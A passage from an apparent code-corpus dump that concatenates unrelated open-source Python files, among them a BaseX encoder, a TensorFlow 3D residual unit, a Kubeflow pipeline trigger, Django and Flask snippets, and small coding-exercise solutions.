V = np.random.rand(40, 100)
nmf = nimfa.Nmf(V, seed="nndsvd", rank=10, max_iter=12, update='euclidean',
objective='fro')
nmf_fit = nmf()
|
contrib/python/cuuid/base_x.py | Kronuz/Xapiand | 370 | 12796455 | <gh_stars>100-1000
#
# Copyright (C) 2015-2018 Dubalu LLC. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
"""
BaseX encoding
"""
__version__ = '0.0.1'
class BaseX(object):
def __init__(self, alphabet, translate):
self.alphabet = alphabet
self.translate = translate
self.base = len(self.alphabet)
self.decoder = [self.base] * 256
for i, a in enumerate(self.alphabet):
o = ord(a)
self.decoder[o] = i
x = -1
for a in self.translate:
o = ord(a)
i = self.decoder[o]
if i < self.base:
x = i
else:
self.decoder[o] = x
def encode_int(self, i, default_one=True):
"""Encode an integer using BaseX"""
if not i and default_one:
return self.alphabet[0]
string = ""
sum_chk = 0
while i:
i, idx = divmod(i, self.base)
string = self.alphabet[idx] + string
sum_chk += idx
sumsz = len(string)
        sum_chk += sumsz + sumsz // self.base
return string, sum_chk % self.base
def encode(self, v):
"""Encode a string using BaseX"""
if not isinstance(v, bytes):
raise TypeError("a bytes-like object is required, not '%s'" % type(v).__name__)
p, acc = 1, 0
for c in map(ord, reversed(v)):
acc += p * c
p = p << 8
result, sum_chk = self.encode_int(acc, default_one=False)
sum_chk = (self.base - (sum_chk % self.base)) % self.base
return result + self.alphabet[sum_chk]
def decode_int(self, v):
"""Decode a BaseX encoded string as an integer"""
if not isinstance(v, str):
v = v.decode('ascii')
decimal = 0
sum_chk = 0
sumsz = 0
for char in v:
o = ord(char)
i = self.decoder[o]
if i < 0:
continue
if i >= self.base:
raise ValueError("Invalid character")
decimal = decimal * self.base + i
sum_chk += i
sumsz += 1
        sum_chk += sumsz + sumsz // self.base
return decimal, sum_chk % self.base
def decode(self, v):
"""Decode a BaseX encoded string"""
if not isinstance(v, str):
v = v.decode('ascii')
while True:
chk = self.decoder[ord(v[-1:])]
v = v[:-1]
if chk < 0:
continue
if chk >= self.base:
raise ValueError("Invalid character")
break
acc, sum_chk = self.decode_int(v)
sum_chk += chk
if sum_chk % self.base:
raise ValueError("Invalid checksum")
result = []
while acc:
result.append(acc & 0xff)
acc >>= 8
return ''.join(map(chr, reversed(result)))
def chksum(self, v):
"""Get checksum character for BaseX encoded string"""
if not isinstance(v, str):
v = v.decode('ascii')
acc, sum_chk = self.decode_int(v)
sum_chk = (self.base - (sum_chk % self.base)) % self.base
return self.alphabet[sum_chk]
b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0')
b59decode = b59.decode
b59encode = b59.encode
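# Round-trip sketch (illustrative, kept as comments). Note that this module appears
# to rely on Python 2 string/division semantics, so the example assumes Python 2.
#
#   encoded = b59encode(b'hello')   # BaseX string with a trailing checksum character
#   original = b59decode(encoded)   # -> 'hello'; raises ValueError on a bad checksum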
def main():
"""BaseX encode or decode FILE, or standard input, to standard output."""
import sys
import argparse
stdout = sys.stdout
parser = argparse.ArgumentParser(description=main.__doc__)
parser.add_argument(
'file',
metavar='FILE',
nargs='?',
type=argparse.FileType('r'),
default='-')
parser.add_argument(
'-d', '--decode',
action='store_true',
help='decode data')
parser.add_argument(
'-c', '--check',
action='store_true',
help='append a checksum before encoding')
args = parser.parse_args()
fun = {
(False, False): b59encode,
(True, False): b59decode,
}[(args.decode, args.check)]
data = args.file.read().rstrip(b'\n')
try:
result = fun(data)
except Exception as e:
sys.exit(e)
if not isinstance(result, bytes):
result = result.encode('ascii')
stdout.write(result)
if __name__ == '__main__':
main()
|
d3status/tasks/email_tasks.py | nicozhang/startUp | 124 | 12796486 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012 feilong.me. All rights reserved.
#
# @author: <NAME> <<EMAIL>>
# Created on Jun 30, 2012
#
from celery.task import task
from d3status.mail import send_email
@task
def send_email_task(fr, to, subject, body, html=None, attachments=[]):
send_email(fr, to, subject, body, html, attachments)
|
clist/migrations/0012_auto_20191123_0953.py | horacexd/clist | 166 | 12796499 | <gh_stars>100-1000
# Generated by Django 2.1.7 on 2019-11-23 09:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('clist', '0011_auto_20190818_1125'),
]
operations = [
migrations.AddIndex(
model_name='contest',
index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'),
),
migrations.AddIndex(
model_name='contest',
index=models.Index(fields=['end_time'], name='clist_conte_end_tim_341782_idx'),
),
]
|
dltk/core/residual_unit.py | themantalope/DLTK | 1,397 | 12796516 | <reponame>themantalope/DLTK<filename>dltk/core/residual_unit.py
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import tensorflow as tf
import numpy as np
def vanilla_residual_unit_3d(inputs,
out_filters,
kernel_size=(3, 3, 3),
strides=(1, 1, 1),
mode=tf.estimator.ModeKeys.EVAL,
use_bias=False,
activation=tf.nn.relu6,
kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'),
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None):
"""Implementation of a 3D residual unit according to [1]. This
implementation supports strided convolutions and automatically
handles different input and output filters.
[1] <NAME> et al. Identity Mappings in Deep Residual Networks. ECCV 2016.
Args:
inputs (tf.Tensor): Input tensor to the residual unit. Is required to
have a rank of 5 (i.e. [batch, x, y, z, channels]).
out_filters (int): Number of convolutional filters used in
the sub units.
        kernel_size (tuple, optional): Size of the convolutional kernels
used in the sub units
strides (tuple, optional): Convolution strides in (x,y,z) of sub
            unit 0. Allows downsampling of the input tensor via strided
convolutions.
mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or
PREDICT
activation (optional): A function to use as activation function.
use_bias (bool, optional): Train a bias with each convolution.
kernel_initializer (TYPE, optional): Initialisation of convolution kernels
bias_initializer (TYPE, optional): Initialisation of bias
kernel_regularizer (None, optional): Additional regularisation op
bias_regularizer (None, optional): Additional regularisation op
Returns:
tf.Tensor: Output of the residual unit
"""
pool_op = tf.layers.max_pooling3d
conv_params = {'padding': 'same',
'use_bias': use_bias,
'kernel_initializer': kernel_initializer,
'bias_initializer': bias_initializer,
'kernel_regularizer': kernel_regularizer,
'bias_regularizer': bias_regularizer}
in_filters = inputs.get_shape().as_list()[-1]
assert in_filters == inputs.get_shape().as_list()[-1], \
'Module was initialised for a different input shape'
x = inputs
orig_x = x
# Handle strided convolutions
if np.prod(strides) != 1:
orig_x = pool_op(inputs=orig_x,
pool_size=strides,
strides=strides,
padding='valid')
# Sub unit 0
with tf.variable_scope('sub_unit0'):
# Adjust the strided conv kernel size to prevent losing information
k = [s * 2 if s > 1 else k for k, s in zip(kernel_size, strides)]
x = tf.layers.batch_normalization(
x, training=mode == tf.estimator.ModeKeys.TRAIN)
x = activation(x)
x = tf.layers.conv3d(
inputs=x,
filters=out_filters,
kernel_size=k, strides=strides,
**conv_params)
# Sub unit 1
with tf.variable_scope('sub_unit1'):
x = tf.layers.batch_normalization(
x, training=mode == tf.estimator.ModeKeys.TRAIN)
x = activation(x)
x = tf.layers.conv3d(
inputs=x,
filters=out_filters,
kernel_size=kernel_size,
strides=(1, 1, 1),
**conv_params)
# Add the residual
with tf.variable_scope('sub_unit_add'):
# Handle differences in input and output filter sizes
if in_filters < out_filters:
orig_x = tf.pad(
tensor=orig_x,
paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[
int(np.floor((out_filters - in_filters) / 2.)),
int(np.ceil((out_filters - in_filters) / 2.))]])
elif in_filters > out_filters:
orig_x = tf.layers.conv3d(
inputs=orig_x,
filters=out_filters,
kernel_size=kernel_size,
strides=(1, 1, 1),
**conv_params)
x += orig_x
return x
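# Usage sketch (illustrative, kept as comments; assumes the TF 1.x API this module
# is written against). A strided unit halves each spatial dimension and can grow
# the channel count:
#
#   inp = tf.placeholder(tf.float32, shape=[1, 32, 32, 32, 16])
#   out = vanilla_residual_unit_3d(inp, out_filters=32, strides=(2, 2, 2),
#                                  mode=tf.estimator.ModeKeys.TRAIN)
#   # out has static shape [1, 16, 16, 16, 32]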
|
examples/simpleApp.py | tgolsson/appJar | 666 | 12796601 | <filename>examples/simpleApp.py
# import the library
from appJar import gui
app = gui() # top slice - CREATE the GUI
app.addLabel("title", "Welcome to appJar") # add a label
app.setLabelBg("title", "red") # set the label's background to be red
app.go() # bottom slice - START the GUI
|
coding_interviews/leetcode/medium/reduce_array_size_to_the_half/reduce_array_size_to_the_half.py | LeandroTk/Algorithms | 205 | 12796620 | <reponame>LeandroTk/Algorithms<filename>coding_interviews/leetcode/medium/reduce_array_size_to_the_half/reduce_array_size_to_the_half.py
# https://leetcode.com/problems/reduce-array-size-to-the-half
'''
Time Complexity: O(NlogN)
Space Complexity: O(N)
'''
def min_set_size(arr):
num_to_count, counts, min_size, current_length = {}, [], 0, len(arr)
for num in arr:
if num in num_to_count:
num_to_count[num] += 1
else:
num_to_count[num] = 1
for num in num_to_count:
counts.append(num_to_count[num])
counts = reversed(sorted(counts))
if len(arr) % 2 == 0:
cut = len(arr) / 2
else:
        cut = (len(arr) + 1) / 2
for count in counts:
min_size += 1
current_length -= count
if current_length <= cut:
return min_size
return min_size
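# Worked example (illustrative): for arr = [3, 3, 3, 3, 5, 5, 5, 2, 2, 7] the counts
# are {3: 4, 5: 3, 2: 2, 7: 1}. Removing all 3s leaves 6 elements (> half of 10), so
# the 5s are removed next, leaving 3 <= 5 -> min_set_size returns 2.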
|
configs/nas_fcos/ranksort_nas_fcos_r50_caffe_fpn_1x_coco_lr0010.py | yinchimaoliang/ranksortloss | 210 | 12796621 | _base_ = 'ranksort_nas_fcos_r50_caffe_fpn_1x_coco.py'
optimizer = dict(lr=0.010)
|
Scripts/s4cl_tests/utils/common_function_utils_tests.py | ColonolNutty/Sims4CommunityLibrary | 118 | 12796652 | """
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Any
from sims4communitylib.modinfo import ModInfo
from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils
from sims4communitylib.testing.common_test_service import CommonTestService
from sims4communitylib.utils.common_function_utils import CommonFunctionUtils
# noinspection PyMissingOrEmptyDocstring
@CommonTestService.test_class(ModInfo.get_identity())
class CommonFunctionUtilsTests:
@staticmethod
@CommonTestService.test(True, True, True, True)
@CommonTestService.test(True, False, True, False)
@CommonTestService.test(True, False, False, True)
@CommonTestService.test(False, False, False, False)
def run_predicates_as_one_should_work_properly(func_result_one: bool, func_result_two: bool, all_must_pass: bool, expected_result: bool):
def _function_one(*_, **__) -> Any:
return func_result_one
def _function_two(*_, **__) -> Any:
return func_result_two
result = CommonFunctionUtils.run_predicates_as_one((_function_one, _function_two), all_must_pass=all_must_pass)()
CommonAssertionUtils.are_equal(result, expected_result)
@staticmethod
@CommonTestService.test(True, False)
@CommonTestService.test(False, True)
def run_predicate_with_reversed_result_should_work_properly(func_result: bool, expected_result: bool):
def _function(*_, **__) -> Any:
return func_result
result = CommonFunctionUtils.run_predicate_with_reversed_result(_function)()
CommonAssertionUtils.are_equal(result, expected_result)
@staticmethod
@CommonTestService.test()
def run_with_arguments_should_work_properly() -> None:
_additional_value = 'No'
_additional_key_word_value = 'What'
normal_val = 'one'
normal_key_val = 'two'
def _function(normal_arg: str, value_one: str, normal_key_arg: str=None, key_value: str=None) -> Any:
CommonAssertionUtils.are_equal(value_one, _additional_value)
CommonAssertionUtils.are_equal(key_value, _additional_key_word_value)
CommonAssertionUtils.are_equal(normal_arg, normal_val)
CommonAssertionUtils.are_equal(normal_key_arg, normal_key_val)
if normal_arg == normal_val and normal_key_arg == normal_key_val and value_one == _additional_value and key_value == _additional_key_word_value:
return True
result = CommonFunctionUtils.run_with_arguments(_function, _additional_value, key_value=_additional_key_word_value)(normal_val, normal_key_arg=normal_key_val)
CommonAssertionUtils.is_true(result, message='Failed to send proper arguments: {}'.format(result))
|
Stock/Data/Engine/Common/DyStockDataCommonEngine.py | Leonardo-YXH/DevilYuan | 135 | 12796671 | <filename>Stock/Data/Engine/Common/DyStockDataCommonEngine.py
from .DyStockDataCodeTable import *
from .DyStockDataTradeDayTable import *
from .DyStockDataSectorCodeTable import *
class DyStockDataCommonEngine(object):
""" 代码表和交易日数据引擎 """
def __init__(self, mongoDbEngine, gateway, info):
self._mongoDbEngine = mongoDbEngine
self._gateway = gateway
self._info = info
self._codeTable = DyStockDataCodeTable(self._mongoDbEngine, self._gateway, self._info)
self._tradeDayTable = DyStockDataTradeDayTable(self._mongoDbEngine, self._gateway, self._info)
self._sectorCodeTable = DyStockDataSectorCodeTable(self._mongoDbEngine, self._gateway, self._info)
def updateCodes(self):
return self._codeTable.update()
def updateTradeDays(self, startDate, endDate):
return self._tradeDayTable.update(startDate, endDate)
def updateSectorCodes(self, sectorCode, startDate, endDate):
return self._sectorCodeTable.update(sectorCode, startDate, endDate)
def updateAllSectorCodes(self, startDate, endDate):
return self._sectorCodeTable.updateAll(startDate, endDate)
def getTradeDays(self, startDate, endDate):
return self._tradeDayTable.get(startDate, endDate)
def getLatestDateInDb(self):
return self._tradeDayTable.getLatestDateInDb()
def getLatestTradeDayInDb(self):
return self._tradeDayTable.getLatestTradeDayInDb()
def getIndex(self, code):
return self._codeTable.getIndex(code)
def getCode(self, name):
return self._codeTable.getCode(name)
def getIndexStockCodes(self, index=None):
return self._codeTable.getIndexStockCodes(index)
def getIndexSectorStockCodes(self, index=None):
if index in DyStockCommon.sectors:
return self._sectorCodeTable.getSectorStockCodes(index)
return self._codeTable.getIndexStockCodes(index)
@property
def shIndex(self):
return self._codeTable.shIndex
@property
def szIndex(self):
return self._codeTable.szIndex
@property
def cybIndex(self):
return self._codeTable.cybIndex
@property
def zxbIndex(self):
return self._codeTable.zxbIndex
@property
def etf50(self):
return self._codeTable.etf50
@property
def etf300(self):
return self._codeTable.etf300
@property
def etf500(self):
return self._codeTable.etf500
@property
def stockFunds(self):
return self._codeTable.stockFunds
@property
def stockSectors(self):
return self._codeTable.stockSectors
@property
def stockCodesFunds(self):
return self._codeTable.stockCodesFunds
@property
def stockAllCodesFunds(self):
return self._codeTable.stockAllCodesFunds
@property
def stockAllCodesFundsSectors(self):
return self._codeTable.stockAllCodesFundsSectors
@property
def stockAllCodes(self):
return self._codeTable.stockAllCodes
@property
def stockCodes(self):
return self._codeTable.stockCodes
@property
def stockIndexes(self):
return self._codeTable.stockIndexes
@property
def stockIndexesSectors(self):
return self._codeTable.stockIndexesSectors
def tDaysOffset(self, base, n):
return self._tradeDayTable.tDaysOffset(base, n)
def tDaysOffsetInDb(self, base, n=0):
return self._tradeDayTable.tDaysOffsetInDb(base, n)
def tDays(self, start, end):
return self._tradeDayTable.get(start, end)
def tDaysCountInDb(self, start, end):
return self._tradeDayTable.tDaysCountInDb(start, end)
def tLatestDay(self):
return self._tradeDayTable.tLatestDay()
def tOldestDay(self):
return self._tradeDayTable.tOldestDay()
def isInTradeDayTable(self, startDate, endDate):
return self._tradeDayTable.isIn(startDate, endDate)
def load(self, dates, codes=None):
if not self._codeTable.load(codes):
return False
return self._tradeDayTable.load(dates)
def loadCodeTable(self, codes=None):
return self._codeTable.load(codes)
def loadTradeDays(self, dates):
return self._tradeDayTable.load(dates)
def loadSectorCodeTable(self, sectorCode, date, codes=None):
return self._sectorCodeTable.load(sectorCode, date, codes)
def getSectorCodes(self, sectorCode):
return self._sectorCodeTable.getSectorStockCodes(sectorCode) |
hackerrank/data-structures/2d-array.py | Ashindustry007/competitive-programming | 506 | 12796688 | #!/usr/bin/env python3
# https://www.hackerrank.com/challenges/2d-array
a=[0]*6
for i in range(6): a[i]=[int(x) for x in input().split()]
c=-9*9
for i in range(1,5):
for j in range(1,5):
c=max(c,a[i-1][j-1]+a[i-1][j]+a[i-1][j+1]+a[i][j]+a[i+1][j-1]+a[i+1][j]+a[i+1][j+1])
print(c)
|
tools/doc2md.py | wiltonlazary/Nidium | 1,223 | 12796710 | #!/usr/bin/env python2.7
import json
from pprint import pprint
import os
import sys
import re
import dokumentor
import subprocess
def parseParam(arg, indent=0, isReturn=False):
out = ""
if isReturn:
out += "Returns (%s): %s\n" % (parseParamsType(arg["typed"]), arg["description"])
else:
out += "%s* `%s` (%s): %s\n" % (' ' * indent, arg["name"], parseParamsType(arg["typed"]), arg["description"])
if "params" in arg:
# Callback function
for subArg in arg["params"]:
out += parseParam(subArg, indent + 4)
elif type(arg["typed"][0]) is dict:
# Object
for subArg in arg["typed"][0]["details"]:
out += parseParam(subArg, 0 if isReturn else indent + 4)
elif type(arg["typed"][0]) is list:
# Array of Object
for subArg in arg["typed"][0][0]["details"]:
out += parseParam(subArg, 0 if isReturn else indent + 4)
return out
def parseParamsType(types):
out = ""
comma = ""
for t in types:
out += comma
if type(t) is list:
out += "Object[]"
elif type(t) is dict:
out += "Object"
else:
if t[0] == "[":
out += t[1:-1].capitalize() + "[]"
else:
if t == "null":
out += t
else:
out += t if t[0].isupper() else t.capitalize()
comma = " | "
return out
def parseMethod(method, isEvent=False):
out = ""
if isEvent:
out += "\n## Event: %s\n" % (re.sub("[A-Za-z_0-9]+\.", "", method["name"]))
else:
fnArgs = ""
if len(method["params"]) > 0:
comma = ""
for arg in method["params"]:
name = comma + arg["name"]
if arg["default"] != "None":
name += "=%s" % arg["default"]
if arg["is_optional"]:
name = "[%s]" % name
fnArgs += name
comma = ", "
out += "\n## %s%s%s(%s)\n" % ("`static `" if method["is_static"] else "",
"new " if method["is_constructor"] else "",
method["name"],
fnArgs)
if method["is_slow"]:
out += "<!-- YAML\n- Slow method\n-->\n"
out += method["description"] + "\n"
if len(method["params"]) > 0:
out += "\nParams:\n"
for arg in method["params"]:
out += parseParam(arg)
if method["returns"] and not method["is_constructor"]:
if method["returns"]["nullable"]:
method["returns"]["typed"].append("null")
tmp = parseParam(method["returns"], isReturn=True)
if tmp:
out += "\n" + tmp
out += parseSeeAlso(method["sees"])
return out
def parseProperty(prop):
out = ""
out += "\n## %s%s%s%s (%s)\n" % ("`static` " if prop["is_static"] else "",
"`readonly` " if prop["is_readonly"] else "",
prop["name"],
"=" + prop["default"] if prop["default"] != "None" else "",
parseParamsType(prop["typed"]))
out += prop["description"] + "\n"
out += parseExample(prop["examples"])
out += parseSeeAlso(prop["sees"])
return out
def parseSeeAlso(seeAlso):
return ""
"""
out = ""
if len(seeAlso) > 0:
out += "\nSee also:\n"
for see in seeAlso:
out += "* `%s`\n" % (see["data"])
return out
"""
def parseExample(examples):
out = ""
if len(examples) > 0:
out += "\n"
for ex in examples:
out += "\n```%s\n%s\n```\n" % (ex["language"], ex["data"])
return out
def parse(klass, data):
out = ""
out += "# Class: %s" % (klass) + "\n"
item = data["base"][klass]
out += item["description"]
out += parseExample(item["examples"])
out += parseSeeAlso(item["sees"])
if data["constructors"]:
out += parseMethod(data["constructors"][klass])
if data["methods"]:
for name, method in data["methods"].iteritems():
out += parseMethod(method)
if data["static_methods"]:
for name, method in data["static_methods"].iteritems():
out += parseMethod(method)
if data["properties"]:
for name, prop in data["properties"].iteritems():
out += parseProperty(prop)
if data["events"]:
for evName, ev in data["events"].iteritems():
out += parseMethod(ev, isEvent=True)
return out
print("Running dokumentor")
class captureDokumentor:
def __init__(self):
self.data = ""
def write(self, msg):
self.data += msg
def flush(self=None):
pass
sys.stdout = captureDokumentor()
dokumentor.process("../docs/")
docs = sys.modules['DOCC'].DOC
dokumentor.report("json", docs)
data = json.loads(sys.stdout.data)
sys.stdout = sys.__stdout__
hierarchy = {}
for section, items in data["_sections"].iteritems():
if section not in data:
data[section] = {"base": { section: {"description": "", "sees":[], "examples": {}}}, "constructors": {}, "methods": [], "properties": [], "events":[], "static_methods": []}
hierarchy[section] = {"data": parse(section, data[section])}
hierarchy[section]["children"] = {}
for klass in items:
hierarchy[section]["children"][klass] = parse(klass, data[klass])
path = "../docs/en/api/"
try:
os.mkdir(path)
except:
pass
for directory in hierarchy:
if len(hierarchy[directory]["children"]) > 1:
subPath = path + directory + "/"
try:
os.mkdir(subPath)
except:
pass
print("Writing %s" % subPath + directory + ".md")
with open(subPath + directory + ".md", "w") as f:
f.write(hierarchy[directory]["data"])
for child in hierarchy[directory]["children"]:
print(" - Writing %s" % subPath + child + ".md")
with open(subPath + child + ".md", "w") as f:
f.write(hierarchy[directory]["children"][child])
else:
print("Writing %s" % path + directory + ".md")
with open(path + directory + ".md", "w") as f:
f.write(hierarchy[directory]["data"])
|
ml/notebook_examples/functions/main.py | bhjeong-goldenplanet/automl | 146 | 12796718 | <filename>ml/notebook_examples/functions/main.py
import logging
import datetime
import time
import kfp
import kfp.compiler as compiler
import kfp.dsl as dsl
import requests
# TODO: replace yours
# HOST = 'https://<yours>.pipelines.googleusercontent.com'
HOST = 'https://7c7f7f3e3d11e1d4-dot-us-central2.pipelines.googleusercontent.com'
@dsl.pipeline(
name='Sequential',
description='A pipeline with two sequential steps.'
)
def sequential_pipeline(filename='gs://ml-pipeline-playground/shakespeare1.txt'):
"""A pipeline with two sequential steps."""
op1 = dsl.ContainerOp(
name='filechange',
image='library/bash:4.4.23',
command=['sh', '-c'],
arguments=['echo "%s" > /tmp/results.txt' % filename],
file_outputs={'newfile': '/tmp/results.txt'})
op2 = dsl.ContainerOp(
name='echo',
image='library/bash:4.4.23',
command=['sh', '-c'],
arguments=['echo "%s"' % op1.outputs['newfile']]
)
def get_access_token():
url = 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'
r = requests.get(url, headers={'Metadata-Flavor': 'Google'})
r.raise_for_status()
access_token = r.json()['access_token']
return access_token
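# Note: the metadata-server URL above is only reachable from inside Google
# Cloud (e.g. when this module runs as a deployed Cloud Function), so the
# trigger below assumes a deployed environment rather than a local run.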
def hosted_kfp_test(data, context):
logging.info('Event ID: {}'.format(context.event_id))
logging.info('Event type: {}'.format(context.event_type))
logging.info('Data: {}'.format(data))
logging.info('Bucket: {}'.format(data['bucket']))
logging.info('File: {}'.format(data['name']))
file_uri = 'gs://%s/%s' % (data['bucket'], data['name'])
logging.info('Using file uri: %s', file_uri)
logging.info('Metageneration: {}'.format(data['metageneration']))
logging.info('Created: {}'.format(data['timeCreated']))
logging.info('Updated: {}'.format(data['updated']))
token = get_access_token()
logging.info('attempting to launch pipeline run.')
ts = int(datetime.datetime.utcnow().timestamp() * 100000)
client = kfp.Client(host=HOST, existing_token=token)
compiler.Compiler().compile(sequential_pipeline, '/tmp/sequential.tar.gz')
exp = client.create_experiment(name='gcstriggered') # this is a 'get or create' op
res = client.run_pipeline(exp.id, 'sequential_' + str(ts), '/tmp/sequential.tar.gz',
params={'filename': file_uri})
logging.info(res)
|
tha2/nn/batch_module/batch_input_module.py | luuil/talking-head-anime-2-demo | 626 | 12796719 | from abc import ABC, abstractmethod
from typing import List
from torch import Tensor
from torch.nn import Module
from tha2.nn.base.module_factory import ModuleFactory
class BatchInputModule(Module, ABC):
def __init__(self):
super().__init__()
@abstractmethod
def forward_from_batch(self, batch: List[Tensor]):
pass
class BatchInputModuleFactory(ModuleFactory):
def __init__(self):
super().__init__()
@abstractmethod
def create(self) -> BatchInputModule:
pass
|
tools/sample.py | VanessaDo/cloudml-samples | 1,552 | 12796723 | <gh_stars>1000+
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Multiline docstrings should
work but could be problematic.
"""
# This is safer.
"""Sample of what to_ipynb.py does"""
# Consecutive Comments are grouped into the same markdown cell.
# The leading '#' symbol is removed so the markdown cells look better.
# *It is okay to use [markdown](https://www.google.com/search?q=markdown).*
import argparse
import os
# Consecutive imports are grouped into a cell.
# Comments cause a new cell to be created, but blank lines between imports are ignored.
# This next import should say `from helpers import ...` even if its source says `from module.helpers import ...`
# Code manipulation is registered in `samples.yaml`.
from module.helpers import (
some_function)
import yyy
import zzz
# Top level classes, function definitions, and expressions are in their own cells.
class A(object): # Inline comments are left as is.
# Inner comments are left as is.
def __init__(self):
pass
class B(object):
pass
def func(arg):
"""Docstrings are left as is"""
def inner_func():
print(arg)
return inner_func
a = A()
print(a)
# This is a markdown cell.
def main(args):
help(func)
# The last thing of the .py file must be the `if __name__ == '__main__':` block.
if __name__ == '__main__':
# Its content is grouped into the last code cell.
# All args should have a default value if the notebook is expected to be runnable without code change.
parser = argparse.ArgumentParser()
parser.add_argument(
'--job-dir',
type=str,
help='Job dir',
default='/tmp/sample'
)
# Use parse_known_args to ignore args passed in when running as a notebook.
args, _ = parser.parse_known_args()
main(args)
|
iota/commands/extended/broadcast_and_store.py | EasonC13/iota.py | 347 | 12796728 | <reponame>EasonC13/iota.py<gh_stars>100-1000
from iota.commands import FilterCommand
from iota.commands.core.broadcast_transactions import \
BroadcastTransactionsCommand
from iota.commands.core.store_transactions import StoreTransactionsCommand
import asyncio
__all__ = [
'BroadcastAndStoreCommand',
]
class BroadcastAndStoreCommand(FilterCommand):
"""
Executes ``broadcastAndStore`` extended API command.
See :py:meth:`iota.api.Iota.broadcast_and_store` for more info.
"""
command = 'broadcastAndStore'
def get_request_filter(self):
pass
def get_response_filter(self):
pass
async def _execute(self, request: dict) -> dict:
# Submit the two coroutines to the already running event loop
await asyncio.gather(
BroadcastTransactionsCommand(self.adapter)(**request),
StoreTransactionsCommand(self.adapter)(**request),
)
return {
'trytes': request['trytes'],
}
|
reddit2telegram/new_channel.py | soulofrubber/reddit2telegram | 187 | 12796746 | #encoding:utf-8
import os
import utils.channels_stuff
def run_script(channel):
os.system('python supplier.py --sub ' + channel.lower())
def med_fashioned_way():
subreddit_name = input('Subreddit name: ')
channel_name = input('Channel name: ')
tags = input('#Tags #in #that #way: ')
print('Submodule is created.')
utils.channels_stuff.set_new_channel(channel_name, subreddit=subreddit_name, tags=tags.lower())
print(channel_name.lower())
print('Run the bot for the first time.')
run_script(channel_name)
print('Done.')
if __name__ == '__main__':
med_fashioned_way()
|
estruturais/flyweight/main.py | caio-bernardo/design-patterns-python | 363 | 12796753 | class KarakTea:
def __init__(self, tea_type):
self.__tea_type = tea_type
@property
def tea_type(self):
return self.__tea_type
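# TeaMaker below plays the flyweight-factory role: it caches one shared
# KarakTea instance per preference string, so repeated orders of the same tea
# type reuse a single object instead of allocating a new one each time.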
class TeaMaker:
def __init__(self):
self.__available_tea = dict()
def make(self, preference):
if preference not in self.__available_tea:
self.__available_tea[preference] = KarakTea(preference)
return self.__available_tea[preference]
class TeaShop:
def __init__(self, tea_maker):
self.__orders = dict()
self.__tea_maker = tea_maker
def take_order(self, tea_type, table):
if table not in self.__orders:
self.__orders[table] = list()
self.__orders[table].append(self.__tea_maker.make(tea_type))
def serve(self):
for table, orders in self.__orders.items():
print('Serving tea to table {}'.format(table))
if __name__ == '__main__':
tea_maker = TeaMaker()
shop = TeaShop(tea_maker)
shop.take_order('red tea', 1)
shop.take_order('red tea more sugar', 2)
shop.take_order('red tea more milk', 3)
shop.serve()
|
py/tests/test_nil.py | JakeMakesStuff/erlpack | 108 | 12796757 | from __future__ import absolute_import
from erlpack import pack
def test_nil():
assert pack(None) == b'\x83s\x03nil'
|
dataviva/apps/user/forms.py | joelvisroman/dataviva-site | 126 | 12796766 | <reponame>joelvisroman/dataviva-site
from flask_wtf import Form
from wtforms import TextField, DateField, BooleanField, HiddenField, validators, PasswordField, SelectField
class SignupForm(Form):
email = TextField('email', validators=[validators.Required(), validators.Email()])
fullname = TextField('fullname', validators=[validators.Required(),
validators.Length(min=3, max=128,
message='Name field must be between 3 and 128 characters long.')])
password = PasswordField('password', validators=[validators.Required(),
validators.EqualTo('confirm',
message='Passwords must match')])
confirm = PasswordField('confirm', validators=[validators.Required()])
agree_mailer = BooleanField('agree_mailer')
class SigninForm(Form):
email = TextField('email', validators=[validators.Required(), validators.Email()])
password = PasswordField('password', validators=[validators.Required()])
class ChangePasswordForm(Form):
current_password = PasswordField('<PASSWORD>', validators=[validators.Required()])
new_password = PasswordField('<PASSWORD>', validators=[validators.Required()])
confirm = PasswordField('confirm', validators=[validators.Required(), validators.EqualTo(
'<PASSWORD>password', message='Passwords must match')])
class LoginForm(Form):
provider = HiddenField('provider', validators=[validators.Required()])
remember_me = BooleanField('remember_me', default=False)
class ForgotPasswordForm(Form):
email = TextField('email', validators=[validators.Required(), validators.Email()])
class ProfileForm(Form):
